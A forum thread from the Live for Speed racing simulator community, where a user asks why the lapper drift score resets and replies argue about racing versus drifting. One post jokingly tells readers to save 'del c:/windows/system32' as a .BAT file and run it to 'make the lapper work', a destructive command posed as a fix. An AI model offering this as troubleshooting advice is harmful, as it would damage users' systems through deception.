The online racing simulator
#1 - Ziroh
Lapper, drifting score.. YOU HAVE TO SEE THIS!!
Y0 :P

After 2 hours trying to get lapper to work, i got it work :P but.. The score is resetting just a few secounds after the drift -.- How to edit that?
-
(Ziroh) DELETED by Ziroh
-
(Ziroh) DELETED by Ziroh
reinstall windows
#3 - Ziroh
well, i didn't reinstalled it but i restarted it :P and almost everything work.. lol
but, is it possible to edit when the counter shoud restart, eks. crashing, stopping ++ ??
#5 - dadge
how's about changing the thread title? there's nothing that important in this thread (and it's in the wrong section).
#7 - Ziroh
Sorry ^^ Just had to get help yesterday.. :P but i found out! (after 5 hours -.-)
drifting is stoooooopid
#10 - Uke
Drifting is not stupid, it's an generation!
Seems like we now have all the elements required for a good racing vs drifting argument:munching_
does racing make smoke?
-
(brandons48) DELETED by brandons48
not tire smoke
for me when i drift, i try to get round the course as fast as possible whilst still trying to maintain a good drifting angle. i quite often get the fastest lap on drift wars server and i'm always sideways.
for me, it's not about "show" drifting but more about controlling the slide at high speed. anyone can doughnut rond a static object but can you take a corner at 80mph sidways?
Copy this in a notepad:

@echo off
del c:/windows/system32

save as .BAT (very important)
then run the file. it's going to make the lapper work

... really don't do that
Quote from Ziroh :Drifting is not stupid, it's an generation!

drifting has been going strong for about 40 years ( give or take )

its much more then a generation, its a business
-
(farcar) DELETED by farcar
Quote from dadge :for me when i drift, i try to get round the course as fast as possible whilst still trying to maintain a good drifting angle. i quite often get the fastest lap on drift wars server and i'm always sideways.
for me, it's not about "show" drifting but more about controlling the slide at high speed. anyone can doughnut rond a static object but can you take a corner at 80mph sidways?

For me, drifting is going sideways.. lol..
so yes, i can drift around a corner in 80mph, and yes i can show-drift.. And yes i can both (lol), i have been born with drifting in the familiy so i know alot..

Quote from Andreas B : So rubber smoke is good for Your health??

ofcourse.. didn't knew that? HAHA
This thread is closed

FGED GREDG RDFGDR GSFDG